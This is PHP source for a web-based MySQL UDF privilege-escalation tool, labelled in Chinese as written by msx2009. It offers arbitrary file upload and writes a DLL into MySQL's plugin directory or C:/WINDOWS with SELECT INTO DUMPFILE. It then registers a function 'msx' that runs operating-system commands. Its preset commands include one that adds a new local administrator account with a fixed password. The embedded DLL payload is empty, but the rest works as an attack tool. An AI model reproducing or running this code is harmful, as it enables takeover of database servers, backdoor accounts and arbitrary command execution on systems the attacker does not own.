<?php
error_reporting(0);
if (get_magic_quotes_gpc()) { 
function stripslashes_deep($value) 
{ 
$value = is_array($value) ? 
array_map('stripslashes_deep', $value) : 
stripslashes($value); 

return $value; 
} 

$_POST = array_map('stripslashes_deep', $_POST); 
$_GET = array_map('stripslashes_deep', $_GET); 
$_COOKIE = array_map('stripslashes_deep', $_COOKIE); 
$_REQUEST = array_map('stripslashes_deep', $_REQUEST); 
} 

session_start();
if($_GET['action']=='logout'){
foreach($_COOKIE["connect"] as $key=>$value){
setcookie("connect[$key]","",time()-1);
}
header("Location:".$_SERVER["SCRIPT_NAME"]);
}
if(!empty($_POST['submit'])){
setcookie("connect");
setcookie("connect[host]",$_POST['host']);
setcookie("connect[name]",$_POST['name']);
setcookie("connect[pass]",$_POST['pass']);
setcookie("connect[dbname]",$_POST['dbname']);
echo "<script>location.href='?action=connect'</script>";
}

/*
foreach($_COOKIE["connect"] as $key=>$value){
echo $key.":".$value."<br>";
}
*/

if(empty($_GET["action"])){
?>

  <?php
exit;
}


$link=@mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["name"],$_COOKIE["connect"]["pass"]);
if(!$link){
echo "连接失败.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "</br><h4>Mysql 提权工具 Code by msx2009</h4>";
echo "</br>连接成功  ";
$str=mysql_get_server_info();
echo 'MYSQL版本:'.$str."  ";

if($str[2]>=1){
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql);
$rows=mysql_fetch_row($row);
$pa=str_replace('\\','/',$rows[1]);
$path=$_SESSION['path']=$pa."/msxtest.dll";

}else{
$path=$_SESSION['path']='C:/WINDOWS/msxtest.dll';
}
}

$conn=mysql_select_db($_COOKIE["connect"]["dbname"],$link);
if(!$conn){
echo "数据不存在.".mysql_error()."<a href='javascript:history.back()'>返回重填</a></script>";
exit;
}else{
echo "数据库--".$_COOKIE['connect']['dbname']."--存在  ";
}
echo '<a href="?action=logout">退出</a>';


echo '<form action="" method="post" enctype="multipart/form-data" name="form1">';     
echo      "当前路径:<input name='p' type='text'  value='".dirname(__FILE__)."\'>  ";
echo     '<input type="file" name="file">';
echo      '<input type="submit" name="subfile" value="上传文件">';
echo'</form>';

if($_POST['subfile']){
$upfile=$_POST['p'].$_FILES['file']['name'];

if(is_uploaded_file($_FILES['file']['tmp_name']))
			{
if(!move_uploaded_file($_FILES['file']['tmp_name'],$upfile)){
echo '上传失败';
}else{
echo '上传成功,路径为'.$upfile;
	  }

			}

					}

echo '<form action="?action=dll" method="post"/>';
echo '路径目录为';
echo "<input type='text' name='dll' size='40' value='$path'/>";
echo '<input type="submit" name="subudf" value="导出udf"/>';
echo '</form>'; 

if($_POST['subudf']){
mysql_query('DROP TABLE Temp_udf');
$query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
if(!$query){
echo '创建临时表Temp_udf失败请查看失败内容'.mysql_error();
}else{
$shellcode=udfcode();
$query="INSERT into Temp_udf values (CONVERT($shellcode,CHAR));";
if(!mysql_query($query)){
echo 'udf插入失败请查看失败内容'.mysql_error();
}else{
$query="SELECT udf FROM Temp_udf INTO DUMPFILE '".$path."';" ;
if(!mysql_query($query)){
echo 'udf导出失败请查看失败内容'.mysql_error();
}else{
mysql_query('DROP TABLE Temp_udf');
echo '导出成功';
}
}
}
}


echo '<form name="form2" method="post" action="">';
echo      '自定义路径:';
echo      '<input name="diypath" type="text" id="diypath" size="27" value="C:/WINDOWS/diy.dll">';
echo          '<input type="submit" name="Submit2" value="自定义导出">';
echo '</form>';

if(!empty($_POST['diy'])){
$diy=str_replace('\\','/',$_POST['diy']);
$diypath=str_replace('\\','/',$_POST['diypath']);
mysql_query('DROP TABLE diy_dll');
$s='create table diy_dll (cmd LONGBLOB)';
if(!mysql_query($s)){
echo '创建diy_dll表失败'.mysql_error();
}else{
$s="insert into diy_dll (cmd) values (hex(load_file('$diy')))";
if(!mysql_query($s)){
echo "插入自定义文件失败".mysql_error();
}else{
$s="SELECT unhex(cmd) FROM diy_dll INTO DUMPFILE '$diypath'";
if(!mysql_query($s)){
echo "导出自定义dll出错".mysql_error();
}else{
mysql_query('DROP TABLE diy_dll');
echo "成功出自定义dll<br>";
}

}

}

}
echo '自带命令:<br>';
echo '<form action="" method="post">';
echo '<select name="mysql">';
echo '<option value="create function msx returns string soname \'msxtest.dll\'">创建msx</option>';
echo '<option value="select msx(\'net user $msx 123456 /add & net localgroup administrators $msx /add\')">添加超级管理员</option>';
echo '<option value="select msx(\'net user\')">查看用户</option>';
echo '<option value="select msx(\'netstat -an\')">查看端口</option>';
echo '<option value="drop function msx ">删除msx</option>';
echo '</select>';
echo '<input type="submit" value="提交" />';
echo '</form>';


echo '<form action="?action=sql" method="post">';
echo '自定义SQL语句: Example：select msx(\'ipconfig\')<br>';
echo '<textarea name="mysql" cols="100" rows="3"></textarea>';
echo '</br><input type="submit" value="执行" />';
echo '</form>';

echo "执行结果:<br>";
echo '<textarea cols="100" rows="5" id="contactus" name="contactus">';
if(!empty($_POST['mysql'])){
echo "SQL语句:".$sql=$_POST['mysql']."\r\n";
$sql=mysql_query($sql) or die(mysql_error());
while($rows=@mysql_fetch_row($sql)){
foreach($rows as $value){
echo $value;
}
}

}

echo '</textarea><br>';
echo '<hr>';
print("
功能说明：<br>
此udf只内置一个函数msx，用于执行系统命令，执行 select msx('命令')

例如： select msx('net user');
");
function udfcode(){

return "0x";


}

?>
